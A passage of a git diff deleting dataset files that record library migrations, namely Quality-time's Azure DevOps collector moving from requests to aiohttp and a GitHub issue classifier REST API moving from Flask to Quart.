-Namespaces = Dict[str, str] # Namespace prefix to Namespace URI mapping -Measurement = Dict[str, Any] -Response = requests.Response -Responses = List[Response] -URL = NewType("URL", str) -Value = Optional[str] diff --git a/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$collector_utilities$type.py.target.py b/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$collector_utilities$type.py.target.py deleted file mode 100644 index 6eea626..0000000 --- a/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$collector_utilities$type.py.target.py +++ /dev/null @@ -1,19 +0,0 @@ -"""Quality-time specific types.""" - -from typing import Any, Dict, List, NewType, Optional, Union - -import aiohttp - - -Entity = Dict[str, Union[int, float, str]] # pylint: disable=invalid-name -Entities = List[Entity] -ErrorMessage = Optional[str] -Job = Dict[str, Any] -Jobs = List[Job] -JSON = Dict[str, Any] -Namespaces = Dict[str, str] # Namespace prefix to Namespace URI mapping -Measurement = Dict[str, Any] -Response = aiohttp.ClientResponse -Responses = List[Response] -URL = NewType("URL", str) -Value = Optional[str] diff --git 
a/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$source_collectors$api_source_collectors$azure_devops.py.diff b/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$source_collectors$api_source_collectors$azure_devops.py.diff deleted file mode 100644 index 9fd73b4..0000000 --- a/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$source_collectors$api_source_collectors$azure_devops.py.diff +++ /dev/null @@ -1,218 +0,0 @@ -diff --git a/components/collector/src/source_collectors/azure_devops.py b/components/collector/src/source_collectors/api_source_collectors/azure_devops.py - index 6df08864df270b6956cc78502aa3d9c0446038d5..d3a9a16a72348cece48c9788cf10db6cc043ec7c 100644 - --- a/components/collector/src/source_collectors/azure_devops.py - +++ b/components/collector/src/source_collectors/api_source_collectors/azure_devops.py -@@ -6,14 +6,14 @@ See https://docs.microsoft.com/en-gb/rest/api/azure/devops/?view=azure-devops-re - - from abc import ABC - from datetime import datetime --from typing import cast, Final, List, Tuple -+from typing import cast, Any, Dict, Final, List, Tuple - - from dateutil.parser import parse --import requests -+import aiohttp - - from collector_utilities.functions import days_ago, match_string_or_regular_expression - from collector_utilities.type import Entities, Job, Response, Responses, URL, Value --from .source_collector import SourceCollector, SourceUpToDatenessCollector, UnmergedBranchesSourceCollector -+from base_collectors import SourceCollector, SourceUpToDatenessCollector, UnmergedBranchesSourceCollector - - - class AzureDevopsIssues(SourceCollector): -@@ -22,43 +22,44 @@ class AzureDevopsIssues(SourceCollector): - MAX_IDS_PER_WORK_ITEMS_API_CALL: Final[int] = 200 # See - # https://docs.microsoft.com/en-us/rest/api/azure/devops/wit/work%20items/list?view=azure-devops-rest-5.1 - -- def _api_url(self) -> URL: -- return URL(f"{super()._api_url()}/_apis/wit/wiql?api-version=4.1") -+ async def _api_url(self) -> URL: -+ return URL(f"{await super()._api_url()}/_apis/wit/wiql?api-version=4.1") - -- def _get_source_responses(self, api_url: URL) -> Responses: -+ async def _get_source_responses(self, *urls: URL) -> Responses: - """Override because we need to do a post request and need to separately get the entities.""" -- auth = self._basic_auth_credentials() -- response = requests.post(api_url, timeout=self.TIMEOUT, auth=auth, json=dict(query=self._parameter("wiql"))) -- ids = [str(work_item["id"]) for work_item in response.json().get("workItems", [])] -+ auth = aiohttp.BasicAuth(str(self._parameter("private_token"))) -+ response = await self._session.post(urls[0], auth=auth, json=dict(query=self._parameter("wiql"))) -+ ids = [str(work_item["id"]) for work_item in (await response.json()).get("workItems", [])] - if not ids: - return [response] - ids_string = ",".join(ids[:min(self.MAX_IDS_PER_WORK_ITEMS_API_CALL, self.MAX_ENTITIES)]) -- work_items_url = URL(f"{super()._api_url()}/_apis/wit/workitems?ids={ids_string}&api-version=4.1") -- return [response, requests.get(work_items_url, timeout=self.TIMEOUT, auth=auth)] -+ work_items_url = URL(f"{await super()._api_url()}/_apis/wit/workitems?ids={ids_string}&api-version=4.1") -+ work_items = await super()._get_source_responses(work_items_url) -+ return [response] + work_items - -- def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: -- value = str(len(responses[0].json()["workItems"])) -+ async def _parse_source_responses(self, 
responses: Responses) -> Tuple[Value, Value, Entities]: -+ value = str(len((await responses[0].json())["workItems"])) - entities = [ - dict( - key=str(work_item["id"]), project=work_item["fields"]["System.TeamProject"], - title=work_item["fields"]["System.Title"], work_item_type=work_item["fields"]["System.WorkItemType"], - state=work_item["fields"]["System.State"], url=work_item["url"]) -- for work_item in self._work_items(responses)] -+ for work_item in await self._work_items(responses)] - return value, "100", entities - - @staticmethod -- def _work_items(responses: Responses): -+ async def _work_items(responses: Responses): - """Return the work items, if any.""" -- return responses[1].json()["value"] if len(responses) > 1 else [] -+ return (await responses[1].json())["value"] if len(responses) > 1 else [] - - - class AzureDevopsReadyUserStoryPoints(AzureDevopsIssues): - """Collector to get ready user story points from Azure Devops Server.""" - -- def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: -- _, total, entities = super()._parse_source_responses(responses) -+ async def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: -+ _, total, entities = await super()._parse_source_responses(responses) - value = 0 -- for entity, work_item in zip(entities, self._work_items(responses)): -+ for entity, work_item in zip(entities, await self._work_items(responses)): - entity["story_points"] = story_points = work_item["fields"].get("Microsoft.VSTS.Scheduling.StoryPoints") - value += 0 if story_points is None else story_points - return str(round(value)), total, entities -@@ -67,30 +68,29 @@ class AzureDevopsReadyUserStoryPoints(AzureDevopsIssues): - class AzureDevopsRepositoryBase(SourceCollector, ABC): # pylint: disable=abstract-method - """Base class for Azure DevOps collectors that work with repositories.""" - -- def _repository_id(self) -> str: -+ async def _repository_id(self) -> str: - """Return the repository id belonging to the repository.""" -- api_url = str(super()._api_url()) -+ api_url = str(await super()._api_url()) - repository = self._parameter("repository") or api_url.rsplit("/", 1)[-1] -- repositories_url = f"{api_url}/_apis/git/repositories?api-version=4.1" -- repositories = requests.get(repositories_url, timeout=self.TIMEOUT, auth=self._basic_auth_credentials()) -- repositories.raise_for_status() -- return str([r for r in repositories.json()["value"] if repository in (r["name"], r["id"])][0]["id"]) -+ repositories_url = URL(f"{api_url}/_apis/git/repositories?api-version=4.1") -+ repositories = (await (await super()._get_source_responses(repositories_url))[0].json())["value"] -+ return str([r for r in repositories if repository in (r["name"], r["id"])][0]["id"]) - - - class AzureDevopsUnmergedBranches(UnmergedBranchesSourceCollector, AzureDevopsRepositoryBase): - """Collector for unmerged branches.""" - -- def _api_url(self) -> URL: -- api_url = str(super()._api_url()) -- return URL(f"{api_url}/_apis/git/repositories/{self._repository_id()}/stats/branches?api-version=4.1") -+ async def _api_url(self) -> URL: -+ api_url = str(await super()._api_url()) -+ return URL(f"{api_url}/_apis/git/repositories/{await self._repository_id()}/stats/branches?api-version=4.1") - -- def _landing_url(self, responses: Responses) -> URL: -- landing_url = str(super()._landing_url(responses)) -+ async def _landing_url(self, responses: Responses) -> URL: -+ landing_url = str(await super()._landing_url(responses)) - repository = 
self._parameter("repository") or landing_url.rsplit("/", 1)[-1] - return URL(f"{landing_url}/_git/{repository}/branches") - -- def _unmerged_branches(self, responses: Responses) -> List: -- return [branch for branch in responses[0].json()["value"] if not branch["isBaseVersion"] and -+ async def _unmerged_branches(self, responses: Responses) -> List[Dict[str, Any]]: -+ return [branch for branch in (await responses[0].json())["value"] if not branch["isBaseVersion"] and - int(branch["aheadCount"]) > 0 and - days_ago(self._commit_datetime(branch)) > int(cast(str, self._parameter("inactive_days"))) and - not match_string_or_regular_expression(branch["name"], self._parameter("branches_to_ignore"))] -@@ -102,35 +102,36 @@ class AzureDevopsUnmergedBranches(UnmergedBranchesSourceCollector, AzureDevopsRe - class AzureDevopsSourceUpToDateness(SourceUpToDatenessCollector, AzureDevopsRepositoryBase): - """Collector class to measure the up-to-dateness of a repo or folder/file in a repo.""" - -- def _api_url(self) -> URL: -- api_url = str(super()._api_url()) -- repository_id = self._repository_id() -+ async def _api_url(self) -> URL: -+ api_url = str(await super()._api_url()) -+ repository_id = await self._repository_id() - path = self._parameter("file_path", quote=True) - branch = self._parameter("branch", quote=True) - search_criteria = \ - f"searchCriteria.itemPath={path}&searchCriteria.itemVersion.version={branch}&searchCriteria.$top=1" - return URL(f"{api_url}/_apis/git/repositories/{repository_id}/commits?{search_criteria}&api-version=4.1") - -- def _landing_url(self, responses: Responses) -> URL: -- landing_url = str(super()._landing_url(responses)) -+ async def _landing_url(self, responses: Responses) -> URL: -+ landing_url = str(await super()._landing_url(responses)) - repository = self._parameter("repository") or landing_url.rsplit("/", 1)[-1] - path = self._parameter("file_path", quote=True) - branch = self._parameter("branch", quote=True) - return URL(f"{landing_url}/_git/{repository}?path={path}&version=GB{branch}") - -- def _parse_source_response_date_time(self, response: Response) -> datetime: -- return parse(response.json()["value"][0]["committer"]["date"]) -+ async def _parse_source_response_date_time(self, response: Response) -> datetime: -+ return parse((await response.json())["value"][0]["committer"]["date"]) - - - class AzureDevopsTests(SourceCollector): - """Collector for the tests metric.""" - -- def _api_url(self) -> URL: -- return URL(f"{super()._api_url()}/_apis/test/runs?automated=true&includeRunDetails=true&$top=1&api-version=5.1") -+ async def _api_url(self) -> URL: -+ api_url = await super()._api_url() -+ return URL(f"{api_url}/_apis/test/runs?automated=true&includeRunDetails=true&$top=1&api-version=5.1") - -- def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: -+ async def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: - test_results = cast(List[str], self._parameter("test_result")) -- runs = responses[0].json().get("value", []) -+ runs = (await responses[0].json()).get("value", []) - test_count, highest_build_nr_seen = 0, 0 - for run in runs: - build_nr = int(run.get("build", {}).get("id", "-1")) -@@ -143,18 +144,18 @@ class AzureDevopsTests(SourceCollector): - return str(test_count), "100", [] - - --class AxureDevopsJobs(SourceCollector): -+class AzureDevopsJobs(SourceCollector): - """Base class for job collectors.""" - -- def _api_url(self) -> URL: -- return 
URL(f"{super()._api_url()}/_apis/build/definitions?includeLatestBuilds=true&api-version=4.1") -+ async def _api_url(self) -> URL: -+ return URL(f"{await super()._api_url()}/_apis/build/definitions?includeLatestBuilds=true&api-version=4.1") - -- def _landing_url(self, responses: Responses) -> URL: -- return URL(f"{super()._api_url()}/_build") -+ async def _landing_url(self, responses: Responses) -> URL: -+ return URL(f"{await super()._api_url()}/_build") - -- def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: -+ async def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: - entities: Entities = [] -- for job in responses[0].json()["value"]: -+ for job in (await responses[0].json())["value"]: - if self._ignore_job(job): - continue - name = self.__job_name(job) -@@ -190,7 +191,7 @@ class AxureDevopsJobs(SourceCollector): - return "/".join(job["path"].strip(r"\\").split(r"\\") + [job["name"]]).strip("/") - - --class AzureDevopsFailedJobs(AxureDevopsJobs): -+class AzureDevopsFailedJobs(AzureDevopsJobs): - """Collector for the failed jobs metric.""" - - def _ignore_job(self, job: Job) -> bool: -@@ -199,7 +200,7 @@ class AzureDevopsFailedJobs(AxureDevopsJobs): - return self._latest_build_result(job) not in self._parameter("failure_type") - - --class AzureDevopsUnusedJobs(AxureDevopsJobs): -+class AzureDevopsUnusedJobs(AzureDevopsJobs): - """Collector for the unused jobs metric.""" - - def _ignore_job(self, job: Job) -> bool: diff --git a/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$source_collectors$api_source_collectors$azure_devops.py.source.py b/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$source_collectors$api_source_collectors$azure_devops.py.source.py deleted file mode 100644 index 05f769d..0000000 --- a/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$source_collectors$api_source_collectors$azure_devops.py.source.py +++ /dev/null @@ -1,210 +0,0 @@ -"""Azure Devops Server metric collector. - -Where possible we use version 4.1 of the API so we can support TFS 2018 and newer. 
-See https://docs.microsoft.com/en-gb/rest/api/azure/devops/?view=azure-devops-rest-4.1#api-and-tfs-version-mapping -""" - -from abc import ABC -from datetime import datetime -from typing import cast, Final, List, Tuple - -from dateutil.parser import parse -import requests - -from collector_utilities.functions import days_ago, match_string_or_regular_expression -from collector_utilities.type import Entities, Job, Response, Responses, URL, Value -from .source_collector import SourceCollector, SourceUpToDatenessCollector, UnmergedBranchesSourceCollector - - -class AzureDevopsIssues(SourceCollector): - """Collector to get issues from Azure Devops Server.""" - - MAX_IDS_PER_WORK_ITEMS_API_CALL: Final[int] = 200 # See - # https://docs.microsoft.com/en-us/rest/api/azure/devops/wit/work%20items/list?view=azure-devops-rest-5.1 - - def _api_url(self) -> URL: - return URL(f"{super()._api_url()}/_apis/wit/wiql?api-version=4.1") - - def _get_source_responses(self, api_url: URL) -> Responses: - """Override because we need to do a post request and need to separately get the entities.""" - auth = self._basic_auth_credentials() - response = requests.post(api_url, timeout=self.TIMEOUT, auth=auth, json=dict(query=self._parameter("wiql"))) - ids = [str(work_item["id"]) for work_item in response.json().get("workItems", [])] - if not ids: - return [response] - ids_string = ",".join(ids[:min(self.MAX_IDS_PER_WORK_ITEMS_API_CALL, self.MAX_ENTITIES)]) - work_items_url = URL(f"{super()._api_url()}/_apis/wit/workitems?ids={ids_string}&api-version=4.1") - return [response, requests.get(work_items_url, timeout=self.TIMEOUT, auth=auth)] - - def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: - value = str(len(responses[0].json()["workItems"])) - entities = [ - dict( - key=str(work_item["id"]), project=work_item["fields"]["System.TeamProject"], - title=work_item["fields"]["System.Title"], work_item_type=work_item["fields"]["System.WorkItemType"], - state=work_item["fields"]["System.State"], url=work_item["url"]) - for work_item in self._work_items(responses)] - return value, "100", entities - - @staticmethod - def _work_items(responses: Responses): - """Return the work items, if any.""" - return responses[1].json()["value"] if len(responses) > 1 else [] - - -class AzureDevopsReadyUserStoryPoints(AzureDevopsIssues): - """Collector to get ready user story points from Azure Devops Server.""" - - def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: - _, total, entities = super()._parse_source_responses(responses) - value = 0 - for entity, work_item in zip(entities, self._work_items(responses)): - entity["story_points"] = story_points = work_item["fields"].get("Microsoft.VSTS.Scheduling.StoryPoints") - value += 0 if story_points is None else story_points - return str(round(value)), total, entities - - -class AzureDevopsRepositoryBase(SourceCollector, ABC): # pylint: disable=abstract-method - """Base class for Azure DevOps collectors that work with repositories.""" - - def _repository_id(self) -> str: - """Return the repository id belonging to the repository.""" - api_url = str(super()._api_url()) - repository = self._parameter("repository") or api_url.rsplit("/", 1)[-1] - repositories_url = f"{api_url}/_apis/git/repositories?api-version=4.1" - repositories = requests.get(repositories_url, timeout=self.TIMEOUT, auth=self._basic_auth_credentials()) - repositories.raise_for_status() - return str([r for r in repositories.json()["value"] if repository in 
(r["name"], r["id"])][0]["id"]) - - -class AzureDevopsUnmergedBranches(UnmergedBranchesSourceCollector, AzureDevopsRepositoryBase): - """Collector for unmerged branches.""" - - def _api_url(self) -> URL: - api_url = str(super()._api_url()) - return URL(f"{api_url}/_apis/git/repositories/{self._repository_id()}/stats/branches?api-version=4.1") - - def _landing_url(self, responses: Responses) -> URL: - landing_url = str(super()._landing_url(responses)) - repository = self._parameter("repository") or landing_url.rsplit("/", 1)[-1] - return URL(f"{landing_url}/_git/{repository}/branches") - - def _unmerged_branches(self, responses: Responses) -> List: - return [branch for branch in responses[0].json()["value"] if not branch["isBaseVersion"] and - int(branch["aheadCount"]) > 0 and - days_ago(self._commit_datetime(branch)) > int(cast(str, self._parameter("inactive_days"))) and - not match_string_or_regular_expression(branch["name"], self._parameter("branches_to_ignore"))] - - def _commit_datetime(self, branch) -> datetime: - return parse(branch["commit"]["committer"]["date"]) - - -class AzureDevopsSourceUpToDateness(SourceUpToDatenessCollector, AzureDevopsRepositoryBase): - """Collector class to measure the up-to-dateness of a repo or folder/file in a repo.""" - - def _api_url(self) -> URL: - api_url = str(super()._api_url()) - repository_id = self._repository_id() - path = self._parameter("file_path", quote=True) - branch = self._parameter("branch", quote=True) - search_criteria = \ - f"searchCriteria.itemPath={path}&searchCriteria.itemVersion.version={branch}&searchCriteria.$top=1" - return URL(f"{api_url}/_apis/git/repositories/{repository_id}/commits?{search_criteria}&api-version=4.1") - - def _landing_url(self, responses: Responses) -> URL: - landing_url = str(super()._landing_url(responses)) - repository = self._parameter("repository") or landing_url.rsplit("/", 1)[-1] - path = self._parameter("file_path", quote=True) - branch = self._parameter("branch", quote=True) - return URL(f"{landing_url}/_git/{repository}?path={path}&version=GB{branch}") - - def _parse_source_response_date_time(self, response: Response) -> datetime: - return parse(response.json()["value"][0]["committer"]["date"]) - - -class AzureDevopsTests(SourceCollector): - """Collector for the tests metric.""" - - def _api_url(self) -> URL: - return URL(f"{super()._api_url()}/_apis/test/runs?automated=true&includeRunDetails=true&$top=1&api-version=5.1") - - def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: - test_results = cast(List[str], self._parameter("test_result")) - runs = responses[0].json().get("value", []) - test_count, highest_build_nr_seen = 0, 0 - for run in runs: - build_nr = int(run.get("build", {}).get("id", "-1")) - if build_nr < highest_build_nr_seen: - continue - if build_nr > highest_build_nr_seen: - highest_build_nr_seen = build_nr - test_count = 0 - test_count += sum(run.get(test_result, 0) for test_result in test_results) - return str(test_count), "100", [] - - -class AxureDevopsJobs(SourceCollector): - """Base class for job collectors.""" - - def _api_url(self) -> URL: - return URL(f"{super()._api_url()}/_apis/build/definitions?includeLatestBuilds=true&api-version=4.1") - - def _landing_url(self, responses: Responses) -> URL: - return URL(f"{super()._api_url()}/_build") - - def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: - entities: Entities = [] - for job in responses[0].json()["value"]: - if self._ignore_job(job): - 
continue - name = self.__job_name(job) - url = job["_links"]["web"]["href"] - build_status = self._latest_build_result(job) - build_date_time = self._latest_build_date_time(job) - entities.append( - dict(name=name, key=name, url=url, - build_date=str(build_date_time.date()), - build_age=str(days_ago(build_date_time)), - build_status=build_status)) - return str(len(entities)), "100", entities - - def _ignore_job(self, job: Job) -> bool: - """Return whether this job should be ignored""" - if not job.get("latestCompletedBuild", {}).get("result"): - return True # The job has no completed builds - return match_string_or_regular_expression(self.__job_name(job), self._parameter("jobs_to_ignore")) - - @staticmethod - def _latest_build_result(job: Job) -> str: - """Return the result of the latest build.""" - return str(job["latestCompletedBuild"]["result"]) - - @staticmethod - def _latest_build_date_time(job: Job) -> datetime: - """Return the finish time of the latest build of the job.""" - return parse(job["latestCompletedBuild"]["finishTime"]) - - @staticmethod - def __job_name(job: Job) -> str: - """Return the job name.""" - return "/".join(job["path"].strip(r"\\").split(r"\\") + [job["name"]]).strip("/") - - -class AzureDevopsFailedJobs(AxureDevopsJobs): - """Collector for the failed jobs metric.""" - - def _ignore_job(self, job: Job) -> bool: - if super()._ignore_job(job): - return True - return self._latest_build_result(job) not in self._parameter("failure_type") - - -class AzureDevopsUnusedJobs(AxureDevopsJobs): - """Collector for the unused jobs metric.""" - - def _ignore_job(self, job: Job) -> bool: - if super()._ignore_job(job): - return True - max_days = int(cast(str, self._parameter("inactive_job_days"))) - actual_days = days_ago(self._latest_build_date_time(job)) - return actual_days <= max_days diff --git a/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$source_collectors$api_source_collectors$azure_devops.py.target.py b/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$source_collectors$api_source_collectors$azure_devops.py.target.py deleted file mode 100644 index 215444b..0000000 --- a/v1/data/codefile/ictu@quality-time__d3a9a16__components$collector$src$source_collectors$api_source_collectors$azure_devops.py.target.py +++ /dev/null @@ -1,211 +0,0 @@ -"""Azure Devops Server metric collector. - -Where possible we use version 4.1 of the API so we can support TFS 2018 and newer. 
-See https://docs.microsoft.com/en-gb/rest/api/azure/devops/?view=azure-devops-rest-4.1#api-and-tfs-version-mapping -""" - -from abc import ABC -from datetime import datetime -from typing import cast, Any, Dict, Final, List, Tuple - -from dateutil.parser import parse -import aiohttp - -from collector_utilities.functions import days_ago, match_string_or_regular_expression -from collector_utilities.type import Entities, Job, Response, Responses, URL, Value -from base_collectors import SourceCollector, SourceUpToDatenessCollector, UnmergedBranchesSourceCollector - - -class AzureDevopsIssues(SourceCollector): - """Collector to get issues from Azure Devops Server.""" - - MAX_IDS_PER_WORK_ITEMS_API_CALL: Final[int] = 200 # See - # https://docs.microsoft.com/en-us/rest/api/azure/devops/wit/work%20items/list?view=azure-devops-rest-5.1 - - async def _api_url(self) -> URL: - return URL(f"{await super()._api_url()}/_apis/wit/wiql?api-version=4.1") - - async def _get_source_responses(self, *urls: URL) -> Responses: - """Override because we need to do a post request and need to separately get the entities.""" - auth = aiohttp.BasicAuth(str(self._parameter("private_token"))) - response = await self._session.post(urls[0], auth=auth, json=dict(query=self._parameter("wiql"))) - ids = [str(work_item["id"]) for work_item in (await response.json()).get("workItems", [])] - if not ids: - return [response] - ids_string = ",".join(ids[:min(self.MAX_IDS_PER_WORK_ITEMS_API_CALL, self.MAX_ENTITIES)]) - work_items_url = URL(f"{await super()._api_url()}/_apis/wit/workitems?ids={ids_string}&api-version=4.1") - work_items = await super()._get_source_responses(work_items_url) - return [response] + work_items - - async def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: - value = str(len((await responses[0].json())["workItems"])) - entities = [ - dict( - key=str(work_item["id"]), project=work_item["fields"]["System.TeamProject"], - title=work_item["fields"]["System.Title"], work_item_type=work_item["fields"]["System.WorkItemType"], - state=work_item["fields"]["System.State"], url=work_item["url"]) - for work_item in await self._work_items(responses)] - return value, "100", entities - - @staticmethod - async def _work_items(responses: Responses): - """Return the work items, if any.""" - return (await responses[1].json())["value"] if len(responses) > 1 else [] - - -class AzureDevopsReadyUserStoryPoints(AzureDevopsIssues): - """Collector to get ready user story points from Azure Devops Server.""" - - async def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: - _, total, entities = await super()._parse_source_responses(responses) - value = 0 - for entity, work_item in zip(entities, await self._work_items(responses)): - entity["story_points"] = story_points = work_item["fields"].get("Microsoft.VSTS.Scheduling.StoryPoints") - value += 0 if story_points is None else story_points - return str(round(value)), total, entities - - -class AzureDevopsRepositoryBase(SourceCollector, ABC): # pylint: disable=abstract-method - """Base class for Azure DevOps collectors that work with repositories.""" - - async def _repository_id(self) -> str: - """Return the repository id belonging to the repository.""" - api_url = str(await super()._api_url()) - repository = self._parameter("repository") or api_url.rsplit("/", 1)[-1] - repositories_url = URL(f"{api_url}/_apis/git/repositories?api-version=4.1") - repositories = (await (await 
super()._get_source_responses(repositories_url))[0].json())["value"] - return str([r for r in repositories if repository in (r["name"], r["id"])][0]["id"]) - - -class AzureDevopsUnmergedBranches(UnmergedBranchesSourceCollector, AzureDevopsRepositoryBase): - """Collector for unmerged branches.""" - - async def _api_url(self) -> URL: - api_url = str(await super()._api_url()) - return URL(f"{api_url}/_apis/git/repositories/{await self._repository_id()}/stats/branches?api-version=4.1") - - async def _landing_url(self, responses: Responses) -> URL: - landing_url = str(await super()._landing_url(responses)) - repository = self._parameter("repository") or landing_url.rsplit("/", 1)[-1] - return URL(f"{landing_url}/_git/{repository}/branches") - - async def _unmerged_branches(self, responses: Responses) -> List[Dict[str, Any]]: - return [branch for branch in (await responses[0].json())["value"] if not branch["isBaseVersion"] and - int(branch["aheadCount"]) > 0 and - days_ago(self._commit_datetime(branch)) > int(cast(str, self._parameter("inactive_days"))) and - not match_string_or_regular_expression(branch["name"], self._parameter("branches_to_ignore"))] - - def _commit_datetime(self, branch) -> datetime: - return parse(branch["commit"]["committer"]["date"]) - - -class AzureDevopsSourceUpToDateness(SourceUpToDatenessCollector, AzureDevopsRepositoryBase): - """Collector class to measure the up-to-dateness of a repo or folder/file in a repo.""" - - async def _api_url(self) -> URL: - api_url = str(await super()._api_url()) - repository_id = await self._repository_id() - path = self._parameter("file_path", quote=True) - branch = self._parameter("branch", quote=True) - search_criteria = \ - f"searchCriteria.itemPath={path}&searchCriteria.itemVersion.version={branch}&searchCriteria.$top=1" - return URL(f"{api_url}/_apis/git/repositories/{repository_id}/commits?{search_criteria}&api-version=4.1") - - async def _landing_url(self, responses: Responses) -> URL: - landing_url = str(await super()._landing_url(responses)) - repository = self._parameter("repository") or landing_url.rsplit("/", 1)[-1] - path = self._parameter("file_path", quote=True) - branch = self._parameter("branch", quote=True) - return URL(f"{landing_url}/_git/{repository}?path={path}&version=GB{branch}") - - async def _parse_source_response_date_time(self, response: Response) -> datetime: - return parse((await response.json())["value"][0]["committer"]["date"]) - - -class AzureDevopsTests(SourceCollector): - """Collector for the tests metric.""" - - async def _api_url(self) -> URL: - api_url = await super()._api_url() - return URL(f"{api_url}/_apis/test/runs?automated=true&includeRunDetails=true&$top=1&api-version=5.1") - - async def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: - test_results = cast(List[str], self._parameter("test_result")) - runs = (await responses[0].json()).get("value", []) - test_count, highest_build_nr_seen = 0, 0 - for run in runs: - build_nr = int(run.get("build", {}).get("id", "-1")) - if build_nr < highest_build_nr_seen: - continue - if build_nr > highest_build_nr_seen: - highest_build_nr_seen = build_nr - test_count = 0 - test_count += sum(run.get(test_result, 0) for test_result in test_results) - return str(test_count), "100", [] - - -class AzureDevopsJobs(SourceCollector): - """Base class for job collectors.""" - - async def _api_url(self) -> URL: - return URL(f"{await super()._api_url()}/_apis/build/definitions?includeLatestBuilds=true&api-version=4.1") - - async def 
_landing_url(self, responses: Responses) -> URL: - return URL(f"{await super()._api_url()}/_build") - - async def _parse_source_responses(self, responses: Responses) -> Tuple[Value, Value, Entities]: - entities: Entities = [] - for job in (await responses[0].json())["value"]: - if self._ignore_job(job): - continue - name = self.__job_name(job) - url = job["_links"]["web"]["href"] - build_status = self._latest_build_result(job) - build_date_time = self._latest_build_date_time(job) - entities.append( - dict(name=name, key=name, url=url, - build_date=str(build_date_time.date()), - build_age=str(days_ago(build_date_time)), - build_status=build_status)) - return str(len(entities)), "100", entities - - def _ignore_job(self, job: Job) -> bool: - """Return whether this job should be ignored""" - if not job.get("latestCompletedBuild", {}).get("result"): - return True # The job has no completed builds - return match_string_or_regular_expression(self.__job_name(job), self._parameter("jobs_to_ignore")) - - @staticmethod - def _latest_build_result(job: Job) -> str: - """Return the result of the latest build.""" - return str(job["latestCompletedBuild"]["result"]) - - @staticmethod - def _latest_build_date_time(job: Job) -> datetime: - """Return the finish time of the latest build of the job.""" - return parse(job["latestCompletedBuild"]["finishTime"]) - - @staticmethod - def __job_name(job: Job) -> str: - """Return the job name.""" - return "/".join(job["path"].strip(r"\\").split(r"\\") + [job["name"]]).strip("/") - - -class AzureDevopsFailedJobs(AzureDevopsJobs): - """Collector for the failed jobs metric.""" - - def _ignore_job(self, job: Job) -> bool: - if super()._ignore_job(job): - return True - return self._latest_build_result(job) not in self._parameter("failure_type") - - -class AzureDevopsUnusedJobs(AzureDevopsJobs): - """Collector for the unused jobs metric.""" - - def _ignore_job(self, job: Job) -> bool: - if super()._ignore_job(job): - return True - max_days = int(cast(str, self._parameter("inactive_job_days"))) - actual_days = days_ago(self._latest_build_date_time(job)) - return actual_days <= max_days diff --git a/v1/data/codefile/intel@stacks-usecase__22cc3f0__github-issue-classification$python$rest.py.diff b/v1/data/codefile/intel@stacks-usecase__22cc3f0__github-issue-classification$python$rest.py.diff deleted file mode 100644 index 3ee5b4d..0000000 --- a/v1/data/codefile/intel@stacks-usecase__22cc3f0__github-issue-classification$python$rest.py.diff +++ /dev/null @@ -1,72 +0,0 @@ -diff --git a/github-issue-classification/python/rest.py b/github-issue-classification/python/rest.py - index ce8ab128833092a58c176083c2efb6bbfd65ed37..22cc3f007a3267ca09a3f53b84fdbfff1f045e88 100644 - --- a/github-issue-classification/python/rest.py - +++ b/github-issue-classification/python/rest.py -@@ -16,39 +16,46 @@ - # limitations under the License. - # - """a rest api for github issue classification""" --import flask --from flask_cors import CORS -+import quart -+ -+from quart import Quart -+from quart_cors import cors -+ - from infer import infer - --app = flask.Flask("github issue classifier") --CORS(app) - --banner = {"what": "github issue classifier", -- "usage": { -- "client": "curl -i -X POST -d '{'issue':'use experimental_jit_scope to enable XLA:CPU.' 
}' http://localhost:5059/github_issues/infer", -- "server": "docker run -d -p 5000:5000 stacks_img_recog" -- } -- } -+app = Quart(__name__) -+cors(app) -+ -+banner = { -+ "what": "github issue classifier", -+ "usage": { -+ "client": "curl -i -X POST -d '{'issue':'use experimental_jit_scope to enable XLA:CPU.' }' http://localhost:5059/github_issues/infer", -+ "server": "docker run -d -p 5000:5000 stacks_img_recog", -+ }, -+} - - --@app.route('/github_issues/', methods=["GET"]) --def index(): -- return flask.jsonify(banner), 201 -+@app.route("/", methods=["get"]) -+@app.route("/index", methods=["get"]) -+@app.route("/github_issues", methods=["get"]) -+async def index(): -+ return quart.jsonify(banner), 201 - - --@app.route('/github_issues/infer', methods=["POST"]) --def pred(): -+@app.route("/github_issues/infer", methods=["POST"]) -+async def pred(): - issue = list() -- issue.append(flask.request.json["issue"]) -- if not flask.request.json or not "issue" in flask.request.json: -- flask.abort(400) -+ issue.append(quart.request.json["issue"]) -+ if not quart.request.json or not "issue" in quart.request.json: -+ quart.abort(400) - labels = infer(issue) -- return flask.jsonify({"label": labels}), 201 -+ return quart.jsonify({"label": labels}), 201 - - - @app.errorhandler(404) --def not_found(error): -- return flask.make_response(flask.jsonify({"error": "Not found"}), 404) -+async def not_found(error): -+ return quart.make_response(quart.jsonify({"error": "Not found"}), 404) - - - if __name__ == "__main__": diff --git a/v1/data/codefile/intel@stacks-usecase__22cc3f0__github-issue-classification$python$rest.py.source.py 